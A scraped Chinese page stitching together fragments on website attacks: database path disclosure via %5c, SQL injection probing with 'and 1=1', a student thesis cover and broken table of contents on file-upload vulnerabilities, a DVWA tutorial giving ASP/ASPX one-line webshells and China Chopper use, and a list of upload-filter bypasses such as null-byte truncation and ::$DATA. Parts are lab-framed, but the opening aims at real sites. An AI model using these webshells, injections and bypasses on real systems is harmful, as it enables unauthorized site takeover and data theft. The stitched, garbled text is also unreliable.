暴库方法:比如一个站的地址为 https://www.360docs.net/doc/b118156555.html,/dispbbs.asp?boardID=7&ID=161,我门就可以把com/dispbbs中间的 /换成%5c,如果有漏洞直接得到数据库的绝对路径,用寻雷什么的下载下来就可以了。还有种方法就是利用默认的数据库路径http: //https://www.360docs.net/doc/b118156555.html,/后面加上conn.asp。如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成%5c)。 为什么换成%5c:因为在ASCII码里/等于%5c,有时碰到数据库名字为/#abc.mdb的为什么下不了? 这里需要把#号换成%23就可以下载了,为什么我暴出的数据库文件是以。ASP结尾的?我该怎么办?这里可以在下载时把.ASP换成.MDB 这样就可以下载了如果还下载不了可能作了防下载。 3 注入漏洞:这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的,可以得到管理员的帐号密码等相关资料。 怎样利用:我先介绍下怎样找漏洞比如这个网址 https://www.360docs.net/doc/b118156555.html,/dispbbs.asp?boardID=7&ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看如果显示正常页面再加上个and 1=2 来看看如果返回正常页面说明没有漏洞如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明
基于文件上传漏洞web渗透技术
安徽警官职业学院学生毕业论文(设计) 所属系别______信息管理系_______ 所属专业_______计算机网络技术__ 班级_______计算机五班______ 学号_______14525526________ 姓名________李超_________ 指导教师________张宇国_________ 完成日期_ _2017年4月20日_____
目录 摘要:............................................. 错误!未定义书签。关键词............................................. 错误!未定义书签。前言............................................... 错误!未定义书签。 一、网络安全问题.................................. 错误!未定义书签。 二、 web的系统安全................................ 错误!未定义书签。 三、文件上传漏洞................................... 错误!未定义书签。 一、网络安全问题.................................. 错误!未定义书签。 1、计算机病毒的影响................................ 错误!未定义书签。 2、计算机网络存在着系统内部的安全威胁............. 错误!未定义书签。 3、缺少严格的网络安全管理制度..................... 错误!未定义书签。 二 web的系统安全.................................. 错误!未定义书签。 1、 web的几个特点................................. 错误!未定义书签。 2、web对保密性的威胁及对策........................ 错误!未定义书签。(1)网络窃听...................................... 错误!未定义书签。( 2 )窃取网络配置信息.............................. 错误!未定义书签。( 3 )窃取主机数据.................................. 错误!未定义书签。( 4 )窃取用户连接信息.............................. 错误!未定义书签。三文件上传漏洞.................................... 错误!未定义书签。(一)、文件上传漏洞概述........................... 错误!未定义书签。(二)、防范文件上传漏洞常见的几种方法。........... 错误!未定义书签。(1)文件上传的目录设置为不可执行.................. 错误!未定义书签。(2)判断文件类型.................................. 错误!未定义书签。(3)使用随机数改写文件名和文件路径................ 错误!未定义书签。(4)单独设置文件服务器的域名...................... 错误!未定义书签。 四、Web渗透技术.................................. 错误!未定义书签。(一)、Web应用渗透性测试框架..................... 错误!未定义书签。结束语:........................................... 错误!未定义书签。致谢............................................... 错误!未定义书签。参考文献:......................................... 错误!未定义书签。
File Upload(文件上传)
Vulnerability: File Upload(文件上传) 需要的环境:phpstuty2018、BSP(bobo)、菜刀、火狐浏览器、DVWA 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['attack']表示从页面中获得attack这个参数值。 入侵条件 其中,只要攻击者满足三个条件,就能实现成功入侵: (1)木马上传成功,未被杀; (2)知道木马的路径在哪; (3)上传的木马能正常运行。 常见的一句话木马: php的一句话木马: asp的一句话是:<%eval request ("pass")%> aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>! 看到的第一眼就是密码是cmd(后面运用菜刀的时候会用到) 木马利用 以下通过DVWA的文件上传漏洞,来看看一句话木马如何使用。 首先在本地(桌面)保存一句话木马文件Hack.php(用记事本编写后修改文件后缀即可):
接下来进入DVWA平台:http://192.168.0.107/DVWA/index.php,准备开始实验。(LOW等级) 我们将准备好的一句话木马直接上传,然后就可以看到回显的路径: 成功将桌面上的文件(1.php)上传到网站资源目录下方 可以用菜刀连接了,菜刀界面右键,然后点击添加。然后填写相关的数据,如下图:
文件上传漏洞(绕过方法)
文件上传校验姿势 ?客户端javascript校验(一般只校验后缀名) ?服务端校验 1)文件头content-type字段校验(image/gif) 2)文件内容头校验(GIF89a) 3)后缀名黑名单校验 4)后缀名白名单校验 5)自定义正则校验 ?WAF设备校验(根据不同的WAF产品而定) 文件上传绕过校验方法 客户端绕过(抓包改包) 方法:可以利用burp抓包改包,先上传一个gif类型的木马,然后通过 burp将其改为asp/php/jsp后缀名即可。 服务器端绕过 1)文件类型绕过 方法:通过抓包,将content-type字段改为image/gif。 2)文件头绕过 方法:在木马内容基础上再加了一些文件信息, 如GIF89a 3)文件后缀名绕过 即黑名单校验,一般有个专门的 blacklist 文件,里面会包含常见 的危险脚本文件。 方法: (1)找黑名单扩展名的漏网之鱼,如下jsp:jspx、jspf;asp:asa、 cer、aspx;php:php、php3、php4;exe:exee (2)可能存在大小写绕过漏洞,例如:aSp、pHp。 4)配合操作系统文件命令规则 (1)上传不符合windows文件命名规则的文件名: test.asp. test.asp(空格) test.php:1.jpg test.php::$DATA shell.php::$DATA…… (2)linux下后缀名大小写 5)配合其他规则 0x00截断:基于一个组合逻辑漏洞造成的,通常存在于构造上传文件路径的时候。test.php(0x00).jpg、test.php%00.jpg。 例如: 路径/upload/1.php(0x00),文件名1.jpg,结合/upload/1.php(0x00)/1.jpg 伪代码演示: